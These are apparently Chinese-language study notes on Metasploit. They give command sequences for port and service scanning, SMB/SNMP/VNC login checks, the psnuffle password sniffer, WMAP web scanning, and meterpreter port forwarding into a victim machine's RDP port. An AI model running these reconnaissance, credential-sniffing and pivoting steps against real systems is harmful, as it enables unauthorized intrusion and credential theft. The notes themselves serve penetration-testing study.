1.Metasploit端口掃描:
在終端輸入msfconsole或直接從應用選metasploit
進入msf>nmap -v -sV 192.168.126.128 與nmap結果一樣
用msf自帶模塊,msf>:
search portscan
use auxiliary/scanner/portscan/syn
show options
set INTERFACE etho0 設置網卡
set port 445 設置掃描端口
set RHOSTS 192.168.126.0/24 設置ip地址
set THREADS 100 設置線程
run
出結果
exit 退出
quit 退出上一步
2.用其他模塊
use auxiliary/scanner/portscan/tcp
show options
set ......
run
3.metasploit smb獲取系統信息
use auxiliary/scanner/smb/smb_version
set RHOSTS IP或段
run
出結果
4.Metsploit服務識別
ssh服務識別:
use auxiliary/scanner/ssh/ssh_version
show options
set RHOSTS ip1 ip2
run
出結果
5.ftp識別:
use auxiliary/scanner/ftp/ftp_version
show options
set RHOSTS IP 設置目標ip地址
run
出結果
6.metasploit密碼嗅探
use auxiliary/sniffer/psnuffle
show options
run
只要ftp登錄 就會查到
7.metasploit SNMP掃描與枚舉
簡單網絡管理議(snmp)
search snmp
掃描:
use auxiliary/scanner/snmp/snmp_login
set options
set RHOSTS IP或段
set THREADS 10
run
枚舉:
use auxiliary/scanner/snmp/snmp_enum
set RHOSTS IP
SET THREADS 10
run
8.metasploit SMB登錄檢查
SMB是一種計算機協議,是用於在計算機間共享文件、打印機、串口等
use auxiliary/scanner/smb/smb_login
show options
set RHOSTS ip
set SMBUser administrator
set THREADS 10
run
9.metasploit VNC身份驗證
VNC (Virtual Network Console)是虛擬網絡控制台的縮寫。它 是一款優秀的遠程控制工具軟件
use auxiliary/scanner/vnc/vnc_none_auth
show options
set RHOSTS ip或段
set THREADS 50
run
10.metasploit WMAP Web 掃描
啟動msfconsole
啟動load wmap
wmap_sites 查看選項
wmap_sites -a http://www.0day.co 添加url
wmap_sites -l 顯示信息 ip
wmap_targets -h 幫助
wmap_targets -t http://ip
wmap_run -h
meterpreter基本隧道代理
portfwd
portfwd 是meterpreter提供的一種基本的端口轉發。porfwd可以反彈單個端口到本地,並且監聽.使用方法如下:
meterpreter > portfwd
0 total local port forwards.
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-L <opt> The local host to listen on (optional). -h Help banner. -l <opt> The local port to listen on. -p <opt> The remote port to connect to. -r <opt> The remote host to connect to.
使用實例介紹:
反彈10.1.1.129端口3389到本地2222並監聽那么可以使用如下方法:
meterpreter > portfwd add -l 2222 -r 10.1.1.129 -p 3389
[*] Local TCP relay created: 0.0.0.0:2222 <-> 10.1.1.129:3389
meterpreter > portfwd
0: 0.0.0.0:2222 -> 10.1.1.129:3389
1 total local port forwards.
已經轉發成功,下面來驗證下:
root@kali:~# netstat -an | grep "2222"
tcp 0 0 0.0.0.0:2222 0.0.0.0:* LISTEN
可以看到已經成功監聽2222端口
接着連接本地2222端口即可連接受害機器10.1.1.129 3389端口,如下:
root@kali:~# rdesktop 127.1.1.0:2222
可以看到,已經成功連接到10.1.1.129 的3389端口